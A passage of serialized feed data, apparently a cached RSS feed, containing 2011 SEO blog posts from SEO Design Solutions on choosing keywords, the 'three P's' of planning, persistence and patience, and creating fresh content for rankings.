id=\"attachment_9005\" class=\"wp-caption aligncenter\" style=\"width: 434px\"><a href=\"http://www.seodesignsolutions.com/blog/seo/is-seo-a-moving-target/\"><img class=\"size-full wp-image-9005\" title=\"is-seo-a-moving-target\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/11/is-seo-a-moving-target.jpg\" alt=\"SEO-Moving-Target\" width=\"424\" height=\"283\" /></a><p class=\"wp-caption-text\">Ready, Aim, Fire!</p></div>\n<p>From Florida updates to Panda maulings, despite the ups and downs, certain metrics remain intact.</p>\n<p>As a webmaster, these <strong>evergreen metrics</strong> are the focal point to remain relevant amidst the rise and fall of questionable <strong>flavor of the month</strong> SEO methodologies before they get leaked, peak and go the way of overused and abused SEO tactics like keyword stuffing and other dated practices from our fabled list of <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/seo-styles-make-the-fight-10-deadly-seo-techniques-to-avoid/\">10 SEO techniques to avoid</a>.<span id=\"more-9004\"></span></p>\n<p>Search engines are stepping up their game, and so should you. Today’s topic is a refresher on strategy, ROI and scalability when determining which keywords are <a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/wrong-market-wrong-keywords-or-seo-strategy/\">worthwhile to engage</a>.</p>\n<h3>Aim for Lucrative Keywords</h3>\n<p>The type of keywords you target matters. Ranking for obscure, less popular keywords never made anyone rich, nor will keyword duds recover their vested interest or the financial return on investment anted up to get ranked in the first place.</p>\n<p>The moral of the story is to <em>watch where you point your SEO</em>, more specifically, target <a href=\"http://www.seodesignsolutions.com/blog/seo/selecting-the-best-keywords/\">the best keywords</a> based <strong>on the climate for conversion</strong>.</p>\n<p>Of the three types of keywords:</p>\n<ul>\n<li>Long tail keywords (easy to rank for, not as much search volume, but you can target more of them with less effort).</li>\n<li>Mid tail keywords (they take more time, but have a steady flow of traffic and conversions) – or -</li>\n<li>Primary root phrases (they take the longest, but are often educational keywords that lack <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-keyword-research-educational-vs-commercial-queries/\">commercial intent</a>).</li>\n</ul>\n<p>Certain keywords produce click throughs and others create conversions. Depending on your business model (if you get paid from CPM advertising, CPA offers, Direct Sales, Lead Generation, or other means) determines <strong>which type of traffic</strong> is more important for your business and where you should put your attention.</p>\n<p>If you find yourself in an organic SEO campaign, make sure you stay away from the <a href=\"http://www.theme-zoom.com/general/neuromarketing-research-shows-bright-shiny-object-syndrome-affecting-thousands/\">bright shiny objects</a> and focus on profitable keyword clusters laced with conversion opportunities <a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/seo-and-intent-where-search-meets-results/\">fermenting with intent</a> that turn browsers into buyers and not browsers into a high bounce rate (which can impact and undermine your websites’ trust and relevance score).</p>\n<h3>Employ Relevancy and Recency</h3>\n<p>Two things make search engines tick (1) relevance and (2) recency – making sure the breaking story is still hot or newsworthy or making sure that someone looking for the best sewing kits or fly fishing rods finds a website worthy of praise.</p>\n<p>Your goal is to become that site by catering to the full spectrum (not just the tip of the iceberg) and use the secret sauce of co-occurrence (using various phrases found in the most authoritative websites on the topic) to ensure your website is the definitive go to destination for not only one type of query but rather a full spectrum of <a href=\"http://www.seodesignsolutions.com/blog/web-resources/semantic-optimization-keywords-and-co-occurrence-revisited/\">semantic variables</a> within a market or niche.</p>\n<p>You accomplish this through topical relevance and by applying constant pressure though content creation or content curation to provide leverage and scale past complacent competitors.</p>\n<p>Keep in mind that Google looks at more than just site structure and links. They observe the stickiness of the page, social signals, bounce rate and uniqueness.</p>\n<p>However, if you need to scale and conquer, then <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/curation-intro-sign-up/\">content curation</a> (if done properly) can still yield favorable results through leveraging the inbound link opportunities that exist (for creating shingles to your primary landing pages) even if the supporting article or page is intended to rank or just serve as eye candy to entice a larger audience.</p>\n<p>If you generate hundreds of visitors to your website daily, search engines will take notice and start sending more theme relevant traffic your way (if you intended it or not).</p>\n<p>The key is to understand the effect and keep enough unique content in play (while remaining relevant and recent) such as using trends data from Google, <a href=\"http://www.alexa.com/whatshot\">what’s hot in Alexa</a> or trending topics in Twitter or Facebook to find the happy medium that can generate a stream of new visitors to your website.</p>\n<p>Flowing with the go instead of merely <em>treading water</em> or getting <em>swept away in a competitive current</em> instead of leveraging the <strong>“what’s hot / it factor”</strong> and integrating some newsworthy topic or recent event can mean the difference between a couple of clicks from random sources or a flurry of traffic.</p>\n<h3>Replicate: Syndication Equals Impact</h3>\n<p>How influential your website becomes is dependent on (1) the audience (2) their propensity to share and (3) the curb appeal of your headlines, writing style, verve or the appeal of the content, tutorial, newsflash or entertainment value therein.</p>\n<p>Expand your reach intelligently by straying away from flimsy content and provide quality through and through to develop genuine domain authority. In other words, <a href=\"http://www.seodesignsolutions.com/blog/internet-marketing/stop-targeting-keywords-target-behaviors/\">target behaviors</a> not just keywords.</p>\n<p>So, before you write your next post, remember, search engines are designed to follow trends, and prefer a full spectrum of topical content on a subject rather than the tip of the iceberg <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/sacrificing-content-for-relevance-using-seo/\">randomness</a>.</p>\n<p>So, before you start writing about dust mites, automotive parts and health and fitness and trying to make it all work, you are only <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-and-google-protect-your-business-from-failure/\">setting yourself up to fail</a>. Snipe a few keywords starting with some low hanging fruit, use those pages or posts to provide internal links to the more competitive mid-tail keywords and then leverage those landing pages using links via syndication to tackle the more competitive <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-modifiers-for-affiliate-marketing/\">traffic-bearing keywords</a>.</p>\n<p>If you target keywords in phases, then you can test, measure, determine what works then lean into the phrases bringing your revenue to scale and replicate through <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/curation-intro-sign-up/\">content curation</a> or syndication of current and legacy content.</p>\n<p>Once mastered, search engines will follow you, not the other way around!</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=igml2SckFds:gUlKiJWcpHI:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/igml2SckFds\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:310:\"Is SEO a moving target or are you simply shooting blanks in the dark? It’s no surprise that for those of you trying to get your site ranked that you&#8217;ve discovered that SEO is “subject to change” and often on a daily or weekly basis. From Florida updates to Panda maulings, despite the ups and [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"5\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:66:\"http://www.seodesignsolutions.com/blog/seo/is-seo-a-moving-target/\";}s:7:\"summary\";s:310:\"Is SEO a moving target or are you simply shooting blanks in the dark? It’s no surprise that for those of you trying to get your site ranked that you&#8217;ve discovered that SEO is “subject to change” and often on a daily or weekly basis. From Florida updates to Panda maulings, despite the ups and [...]\";s:12:\"atom_content\";s:8647:\"<p>Is SEO a moving target or are you simply shooting blanks in the dark? It’s no surprise that for those of you trying to get your site ranked that you&#8217;ve discovered that SEO is <strong>“subject to change”</strong> and often on a daily or weekly basis.</p>\n<div id=\"attachment_9005\" class=\"wp-caption aligncenter\" style=\"width: 434px\"><a href=\"http://www.seodesignsolutions.com/blog/seo/is-seo-a-moving-target/\"><img class=\"size-full wp-image-9005\" title=\"is-seo-a-moving-target\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/11/is-seo-a-moving-target.jpg\" alt=\"SEO-Moving-Target\" width=\"424\" height=\"283\" /></a><p class=\"wp-caption-text\">Ready, Aim, Fire!</p></div>\n<p>From Florida updates to Panda maulings, despite the ups and downs, certain metrics remain intact.</p>\n<p>As a webmaster, these <strong>evergreen metrics</strong> are the focal point to remain relevant amidst the rise and fall of questionable <strong>flavor of the month</strong> SEO methodologies before they get leaked, peak and go the way of overused and abused SEO tactics like keyword stuffing and other dated practices from our fabled list of <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/seo-styles-make-the-fight-10-deadly-seo-techniques-to-avoid/\">10 SEO techniques to avoid</a>.<span id=\"more-9004\"></span></p>\n<p>Search engines are stepping up their game, and so should you. Today’s topic is a refresher on strategy, ROI and scalability when determining which keywords are <a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/wrong-market-wrong-keywords-or-seo-strategy/\">worthwhile to engage</a>.</p>\n<h3>Aim for Lucrative Keywords</h3>\n<p>The type of keywords you target matters. Ranking for obscure, less popular keywords never made anyone rich, nor will keyword duds recover their vested interest or the financial return on investment anted up to get ranked in the first place.</p>\n<p>The moral of the story is to <em>watch where you point your SEO</em>, more specifically, target <a href=\"http://www.seodesignsolutions.com/blog/seo/selecting-the-best-keywords/\">the best keywords</a> based <strong>on the climate for conversion</strong>.</p>\n<p>Of the three types of keywords:</p>\n<ul>\n<li>Long tail keywords (easy to rank for, not as much search volume, but you can target more of them with less effort).</li>\n<li>Mid tail keywords (they take more time, but have a steady flow of traffic and conversions) – or -</li>\n<li>Primary root phrases (they take the longest, but are often educational keywords that lack <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-keyword-research-educational-vs-commercial-queries/\">commercial intent</a>).</li>\n</ul>\n<p>Certain keywords produce click throughs and others create conversions. Depending on your business model (if you get paid from CPM advertising, CPA offers, Direct Sales, Lead Generation, or other means) determines <strong>which type of traffic</strong> is more important for your business and where you should put your attention.</p>\n<p>If you find yourself in an organic SEO campaign, make sure you stay away from the <a href=\"http://www.theme-zoom.com/general/neuromarketing-research-shows-bright-shiny-object-syndrome-affecting-thousands/\">bright shiny objects</a> and focus on profitable keyword clusters laced with conversion opportunities <a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/seo-and-intent-where-search-meets-results/\">fermenting with intent</a> that turn browsers into buyers and not browsers into a high bounce rate (which can impact and undermine your websites’ trust and relevance score).</p>\n<h3>Employ Relevancy and Recency</h3>\n<p>Two things make search engines tick (1) relevance and (2) recency – making sure the breaking story is still hot or newsworthy or making sure that someone looking for the best sewing kits or fly fishing rods finds a website worthy of praise.</p>\n<p>Your goal is to become that site by catering to the full spectrum (not just the tip of the iceberg) and use the secret sauce of co-occurrence (using various phrases found in the most authoritative websites on the topic) to ensure your website is the definitive go to destination for not only one type of query but rather a full spectrum of <a href=\"http://www.seodesignsolutions.com/blog/web-resources/semantic-optimization-keywords-and-co-occurrence-revisited/\">semantic variables</a> within a market or niche.</p>\n<p>You accomplish this through topical relevance and by applying constant pressure though content creation or content curation to provide leverage and scale past complacent competitors.</p>\n<p>Keep in mind that Google looks at more than just site structure and links. They observe the stickiness of the page, social signals, bounce rate and uniqueness.</p>\n<p>However, if you need to scale and conquer, then <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/curation-intro-sign-up/\">content curation</a> (if done properly) can still yield favorable results through leveraging the inbound link opportunities that exist (for creating shingles to your primary landing pages) even if the supporting article or page is intended to rank or just serve as eye candy to entice a larger audience.</p>\n<p>If you generate hundreds of visitors to your website daily, search engines will take notice and start sending more theme relevant traffic your way (if you intended it or not).</p>\n<p>The key is to understand the effect and keep enough unique content in play (while remaining relevant and recent) such as using trends data from Google, <a href=\"http://www.alexa.com/whatshot\">what’s hot in Alexa</a> or trending topics in Twitter or Facebook to find the happy medium that can generate a stream of new visitors to your website.</p>\n<p>Flowing with the go instead of merely <em>treading water</em> or getting <em>swept away in a competitive current</em> instead of leveraging the <strong>“what’s hot / it factor”</strong> and integrating some newsworthy topic or recent event can mean the difference between a couple of clicks from random sources or a flurry of traffic.</p>\n<h3>Replicate: Syndication Equals Impact</h3>\n<p>How influential your website becomes is dependent on (1) the audience (2) their propensity to share and (3) the curb appeal of your headlines, writing style, verve or the appeal of the content, tutorial, newsflash or entertainment value therein.</p>\n<p>Expand your reach intelligently by straying away from flimsy content and provide quality through and through to develop genuine domain authority. In other words, <a href=\"http://www.seodesignsolutions.com/blog/internet-marketing/stop-targeting-keywords-target-behaviors/\">target behaviors</a> not just keywords.</p>\n<p>So, before you write your next post, remember, search engines are designed to follow trends, and prefer a full spectrum of topical content on a subject rather than the tip of the iceberg <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/sacrificing-content-for-relevance-using-seo/\">randomness</a>.</p>\n<p>So, before you start writing about dust mites, automotive parts and health and fitness and trying to make it all work, you are only <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-and-google-protect-your-business-from-failure/\">setting yourself up to fail</a>. Snipe a few keywords starting with some low hanging fruit, use those pages or posts to provide internal links to the more competitive mid-tail keywords and then leverage those landing pages using links via syndication to tackle the more competitive <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-modifiers-for-affiliate-marketing/\">traffic-bearing keywords</a>.</p>\n<p>If you target keywords in phases, then you can test, measure, determine what works then lean into the phrases bringing your revenue to scale and replicate through <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/curation-intro-sign-up/\">content curation</a> or syndication of current and legacy content.</p>\n<p>Once mastered, search engines will follow you, not the other way around!</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=igml2SckFds:gUlKiJWcpHI:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/igml2SckFds\" height=\"1\" width=\"1\"/>\";}i:28;a:12:{s:5:\"title\";s:32:\"The Three P’s of SEO Conquest!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/1FIc3wfYvv4/\";s:8:\"category\";s:67:\"SEOPlanning Your SEO StrategySEO ConquestSEO Strategies and Tactics\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Mon, 31 Oct 2011 04:55:42 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=8997\";s:7:\"content\";a:1:{s:7:\"encoded\";s:7365:\"<p>Rome was not built in a day, nor was a dominant search engine ranking for a competitive keyword either. Feats of valor and substance require the proper tact and follow through, which lead to the next point.</p>\n<div id=\"attachment_8998\" class=\"wp-caption aligncenter\" style=\"width: 375px\"><a href=\"http://www.seodesignsolutions.com/blog/seo/the-three-ps-of-seo-conquest/\"><img class=\"size-full wp-image-8998\" title=\"rome\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/10/rome.jpg\" alt=\"Roman Warrior\" width=\"365\" height=\"329\" /></a><p class=\"wp-caption-text\">Rome was not built in a day</p></div>\n<p>In order to conquer competitors and reach the top 10 results, you need to understand the 3 P’s of SEO conquest and live by their credo.</p>\n<p>The 3P’s of SEO are:</p>\n<ul>\n<li>Planning</li>\n<li>Persistence</li>\n<li>Patience</li>\n</ul>\n<p>As rudimentary as these 3 words appear, once you understand that everything can be reduced to its essence, and the essence of a strong SEO campaign is founded upon these three principles.<span id=\"more-8997\"></span></p>\n<h3>PLANNING</h3>\n<p>Planning – No battle (at least any significant one) was ever one from a bunch of warriors just showing up, after picking a random direction, with no battle plan – against a significant adversary.</p>\n<p>Any worthwhile endeavor is born from planning. In this instance you need to survey the reach and exposure of your competitors (content, links, advertising budget, whether or not they are using affiliates, etc.) in order to surmise their strengths and weaknesses.</p>\n<p>Based on your discovery, you look for chinks in the armor to determine whether or not their weakness will serve your advance.</p>\n<p>For example, if your competitor is relying solely on one type of promotion too heavily, that would provide you with an opportunity to leverage a medium they may be ignoring (like Press releases, editorial content swapping on powerful websites, powerhouse aged directories or even selective article marketing &#8211; <em>to get tons of long tail inbound links to your landing pages</em>).</p>\n<p>Study their rankings, see where they are visible and start with a solid plan that you can (a) roll out as aggressively as your budget permits but (b) is founded in a timeline with KPI’s (<a href=\"http://www.seodesignsolutions.com/blog/seo-consulting/seo-and-kpi-key-performance-indicators/\">key performance indicators</a>) as a sounding board for advancement and ROI (return on investment).</p>\n<p>Be aware it may take 6-9 months to get a foothold for competitive verticals, but the traffic is your reward (if you cultivate positioning on the appropriate keyword/fronts).</p>\n<h3>PERSISTENCE</h3>\n<p>Persistence – Are you the kind of guy (or girl) that picks a fight with an 800 pound gorilla, then once you get hit in the face throw in the towel and give up? If so, then SEO is not for you (you are better off paying for every click with PPC or media buys).</p>\n<p>Persistence is one of your most notable allies in the battles that erupt with the other 990 contenders on your ascent to the top 10. If you crumble easily or get flustered if you rise 5 pages for a few weeks, then fall back 2 pages, then reconsider your resolve.</p>\n<p>Search engine result pages (SERPs) are volatile, as there are hundreds of known factors and thousands of variables which contribute to a website remaining buoyant amidst the chaos of recency and relevance in addition to competitors all aiming to <strong>take your spot</strong>.</p>\n<p>You have to stay active in order to impress search engine algorithms, and that means using diversity (in keywords, internal links, the <a href=\"http://www.seodesignsolutions.com/blog/seo-basics/content-creation/\">content you publish</a> on site and how you reinforce that content through syndication or off page ranking factors).</p>\n<p>The key is to keep things moving and to scale <a href=\"http://www.seodesignsolutions.com/blog/seo/is-your-on-page-seo-strong-enough/\">on page SEO</a> equally while focusing on promotion and off page (links and syndication). We never advise any type of SEO campaign without recommending the addition of fresh, topical content being dripped daily to the web from the property you are trying to establish.</p>\n<p>On page content sends a clear signal that your effort is genuine and each new page gives you an opportunity to reinforce another shingle (group of words) that are pieces in the puzzle (parts of the semantic hierarchy) that you are attempting to establish a foothold in.</p>\n<p>The more keywords your website spans, the more relevant your website becomes. The more relevant your website becomes, the more search engines will funnel traffic to your pages. The more traffic and exposure you receive, the more you can leverage those ranked pages to rank 10 more in kind and in essence develop a ranking juggernaut.</p>\n<p>This is a worthy strategy for conquest, building an authority site to weather SERP fluctuations and lazy competitors. All the while, this is only part one of the equation. When you couple this with progressive off page inbound links (over time) all keywords are attainable (if you cross the tipping point).</p>\n<p>The question is, do you have the commitment, persistence, drive, budget or time to do so. If you are up against a competitor who has been dominant for 5 years uncontested by a challenger, then be prepared to engage the battle (when they see you picking off keywords and taking their spots).</p>\n<p>This is why the next virtue is of extreme importance… that virtue is patience.</p>\n<h3>PATIENCE</h3>\n<p>Patience is not a naturally occurring trait for most; it must be developed over time. SEO requires time and much like a great battle or game of chess getting to the end game with an advantage all depends on what moves you made in the beginning or previous moves leading up to it.</p>\n<p>While there are various strategies and tactics, they are mere pieces on the board. What matters is how they are used (leverage), when you use them (timing) and why you would elect to use them in the first place (circumstance).  To sift through the archives of our strategies, you need look no further than our <a href=\"http://www.seodesignsolutions.com/sitemap.xml\">sitemap</a> for gems. But no strategy or tactic will help you if you don’t have the patience to let it play out.</p>\n<p>So, before you pick your next battle or your next keyword, know what you are up against and plan accordingly. Remember, Rome was not built in a day and neither is a lucrative ranking either – so, bring your best arsenal (<a href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/how-to-seo-your-website/\">site architecture</a>, content creation, internal links and syndication and backlinks) or you are already defeated before even stepping on the battlefield from some competitor who already has.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=1FIc3wfYvv4:_eG9UzenEm8:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/1FIc3wfYvv4\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:309:\"Rome was not built in a day, nor was a dominant search engine ranking for a competitive keyword either. Feats of valor and substance require the proper tact and follow through, which lead to the next point. In order to conquer competitors and reach the top 10 results, you need to understand the 3 P’s [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"2\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:72:\"http://www.seodesignsolutions.com/blog/seo/the-three-ps-of-seo-conquest/\";}s:7:\"summary\";s:309:\"Rome was not built in a day, nor was a dominant search engine ranking for a competitive keyword either. Feats of valor and substance require the proper tact and follow through, which lead to the next point. In order to conquer competitors and reach the top 10 results, you need to understand the 3 P’s [...]\";s:12:\"atom_content\";s:7365:\"<p>Rome was not built in a day, nor was a dominant search engine ranking for a competitive keyword either. Feats of valor and substance require the proper tact and follow through, which lead to the next point.</p>\n<div id=\"attachment_8998\" class=\"wp-caption aligncenter\" style=\"width: 375px\"><a href=\"http://www.seodesignsolutions.com/blog/seo/the-three-ps-of-seo-conquest/\"><img class=\"size-full wp-image-8998\" title=\"rome\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/10/rome.jpg\" alt=\"Roman Warrior\" width=\"365\" height=\"329\" /></a><p class=\"wp-caption-text\">Rome was not built in a day</p></div>\n<p>In order to conquer competitors and reach the top 10 results, you need to understand the 3 P’s of SEO conquest and live by their credo.</p>\n<p>The 3P’s of SEO are:</p>\n<ul>\n<li>Planning</li>\n<li>Persistence</li>\n<li>Patience</li>\n</ul>\n<p>As rudimentary as these 3 words appear, once you understand that everything can be reduced to its essence, and the essence of a strong SEO campaign is founded upon these three principles.<span id=\"more-8997\"></span></p>\n<h3>PLANNING</h3>\n<p>Planning – No battle (at least any significant one) was ever one from a bunch of warriors just showing up, after picking a random direction, with no battle plan – against a significant adversary.</p>\n<p>Any worthwhile endeavor is born from planning. In this instance you need to survey the reach and exposure of your competitors (content, links, advertising budget, whether or not they are using affiliates, etc.) in order to surmise their strengths and weaknesses.</p>\n<p>Based on your discovery, you look for chinks in the armor to determine whether or not their weakness will serve your advance.</p>\n<p>For example, if your competitor is relying solely on one type of promotion too heavily, that would provide you with an opportunity to leverage a medium they may be ignoring (like Press releases, editorial content swapping on powerful websites, powerhouse aged directories or even selective article marketing &#8211; <em>to get tons of long tail inbound links to your landing pages</em>).</p>\n<p>Study their rankings, see where they are visible and start with a solid plan that you can (a) roll out as aggressively as your budget permits but (b) is founded in a timeline with KPI’s (<a href=\"http://www.seodesignsolutions.com/blog/seo-consulting/seo-and-kpi-key-performance-indicators/\">key performance indicators</a>) as a sounding board for advancement and ROI (return on investment).</p>\n<p>Be aware it may take 6-9 months to get a foothold for competitive verticals, but the traffic is your reward (if you cultivate positioning on the appropriate keyword/fronts).</p>\n<h3>PERSISTENCE</h3>\n<p>Persistence – Are you the kind of guy (or girl) that picks a fight with an 800 pound gorilla, then once you get hit in the face throw in the towel and give up? If so, then SEO is not for you (you are better off paying for every click with PPC or media buys).</p>\n<p>Persistence is one of your most notable allies in the battles that erupt with the other 990 contenders on your ascent to the top 10. If you crumble easily or get flustered if you rise 5 pages for a few weeks, then fall back 2 pages, then reconsider your resolve.</p>\n<p>Search engine result pages (SERPs) are volatile, as there are hundreds of known factors and thousands of variables which contribute to a website remaining buoyant amidst the chaos of recency and relevance in addition to competitors all aiming to <strong>take your spot</strong>.</p>\n<p>You have to stay active in order to impress search engine algorithms, and that means using diversity (in keywords, internal links, the <a href=\"http://www.seodesignsolutions.com/blog/seo-basics/content-creation/\">content you publish</a> on site and how you reinforce that content through syndication or off page ranking factors).</p>\n<p>The key is to keep things moving and to scale <a href=\"http://www.seodesignsolutions.com/blog/seo/is-your-on-page-seo-strong-enough/\">on page SEO</a> equally while focusing on promotion and off page (links and syndication). We never advise any type of SEO campaign without recommending the addition of fresh, topical content being dripped daily to the web from the property you are trying to establish.</p>\n<p>On page content sends a clear signal that your effort is genuine and each new page gives you an opportunity to reinforce another shingle (group of words) that are pieces in the puzzle (parts of the semantic hierarchy) that you are attempting to establish a foothold in.</p>\n<p>The more keywords your website spans, the more relevant your website becomes. The more relevant your website becomes, the more search engines will funnel traffic to your pages. The more traffic and exposure you receive, the more you can leverage those ranked pages to rank 10 more in kind and in essence develop a ranking juggernaut.</p>\n<p>This is a worthy strategy for conquest, building an authority site to weather SERP fluctuations and lazy competitors. All the while, this is only part one of the equation. When you couple this with progressive off page inbound links (over time) all keywords are attainable (if you cross the tipping point).</p>\n<p>The question is, do you have the commitment, persistence, drive, budget or time to do so. If you are up against a competitor who has been dominant for 5 years uncontested by a challenger, then be prepared to engage the battle (when they see you picking off keywords and taking their spots).</p>\n<p>This is why the next virtue is of extreme importance… that virtue is patience.</p>\n<h3>PATIENCE</h3>\n<p>Patience is not a naturally occurring trait for most; it must be developed over time. SEO requires time and much like a great battle or game of chess getting to the end game with an advantage all depends on what moves you made in the beginning or previous moves leading up to it.</p>\n<p>While there are various strategies and tactics, they are mere pieces on the board. What matters is how they are used (leverage), when you use them (timing) and why you would elect to use them in the first place (circumstance).  To sift through the archives of our strategies, you need look no further than our <a href=\"http://www.seodesignsolutions.com/sitemap.xml\">sitemap</a> for gems. But no strategy or tactic will help you if you don’t have the patience to let it play out.</p>\n<p>So, before you pick your next battle or your next keyword, know what you are up against and plan accordingly. Remember, Rome was not built in a day and neither is a lucrative ranking either – so, bring your best arsenal (<a href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/how-to-seo-your-website/\">site architecture</a>, content creation, internal links and syndication and backlinks) or you are already defeated before even stepping on the battlefield from some competitor who already has.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=1FIc3wfYvv4:_eG9UzenEm8:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/1FIc3wfYvv4\" height=\"1\" width=\"1\"/>\";}i:29;a:12:{s:5:\"title\";s:28:\"Create Content With Purpose!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/nv1fnesjQlY/\";s:8:\"category\";s:104:\"SEO BasicsContent Curationcontent-creationContent-SyndicationSEOSEO Content CreationThe Value of Content\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Thu, 27 Oct 2011 06:51:02 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=8990\";s:7:\"content\";a:1:{s:7:\"encoded\";s:7042:\"<p><strong> </strong>Today&#8217;s topic is <strong>creating content with purpose</strong> (adding fresh content on your website) which serves a dual purpose for SEO and user engagement. Both are equally important and necessary in the grand scheme of the evolution of your website.</p>\n<div id=\"attachment_8991\" class=\"wp-caption aligncenter\" style=\"width: 357px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-basics/content-creation/\"><img class=\"size-full wp-image-8991\" title=\"tactful-content-creation\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/10/tactful-content-creation.jpg\" alt=\"tactful content creation\" width=\"347\" height=\"346\" /></a><p class=\"wp-caption-text\">Create Content With Purpose</p></div>\n<p>The first short-term purpose is to generate a surge of <em>present-tense</em> traffic. Even if your new page or post generates 25 new visitors to your website in one day, reaching 100, 200 or 500 visitors per day is scalable by the introduction and syndication of new and / or relevant content.<span id=\"more-8990\"></span></p>\n<p>The second <em>long-term purpose</em> content creation serves is the ability for each page you create to age and transform into a <strong>powerful hub page</strong> (replete with PageRank, link-flow and ranking power) which can funnel link juice to more critical (<strong>spoke in the wheel</strong>) commercial pages with the express intent of getting those pages into the top 10 spotlight.</p>\n<p>As traffic and mileage may vary <em>from website to website</em> depending on the subject/topic, demand and/or authority of your website; in the instance of <a href=\"http://www.seodesignsolutions.com/\">SEO Design Solutions</a>, I know that I can generate additional 300-400 fresh visitors per day from one blog post over the average ambient traffic we receive to our website from the aged legacy content it houses.</p>\n<p>The other added benefit is the more content you have the more PageRank and authority you develop. The takeaway is that creating qualified, rich, engaging content not only wins you points from search engines, but will insulate your website from vacillations (rising and falling) if minor algorithmic changes threaten the relevancy and ranking landscape (if you were relying on off page backlinks alone).</p>\n<p>A proper SEO campaign should always involve the introduction of fresh/relevant content. Not so much to obfuscate links or link building as much as the on-page justification of giving search engines a reason to rank a website higher (from being a genuine resource).</p>\n<p>Search engines are based on a basic principle (1) crawl, index and store content and then (2) use that content to query against (with 200+ relevance and recency filters) to determine which group of websites are (a) trusted and (b) authoritative enough to rank in the <strong>“authority set”</strong> – the top 10 results.</p>\n<p>Aside from the two points made above about creating more traffic and leveraging pages eventually to foster additional buoyancy for landing pages. Content (and the quality and relevance of the content) is truly one of the more prominent metrics that search engines use when deciding who wins the click (as a result of where they are positioned in the search engines index).</p>\n<p>On page <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-and-internal-linking/\">internal linking</a> opportunities are also a side benefit of strategic content creation. By spanning the topical nodes of synonyms and other related phrases that pertain to the topic, you can sprinkle phrases in landing pages and / or supporting pages which you can use for internal links.</p>\n<p>These internal links carry more weight in the algorithm than links found in common areas like the footer, sidebar or navigation and a page that is a PageRank 3 internal page (for example) passes equally as much weight through a link as a link from another website/page from outside the website. This means the more pages in your website that have trust, relevance, PageRank/Link-flow or authority, the less you need to depend on backlinks to get ranked.</p>\n<p>When you understand the premise of theming your content (creating a main topic and nesting supporting keywords, articles and / or pages), your own website becomes a <a href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/how-to-consolidate-on-page-seo-with-content-navigation-and-links/\">powerful on-page 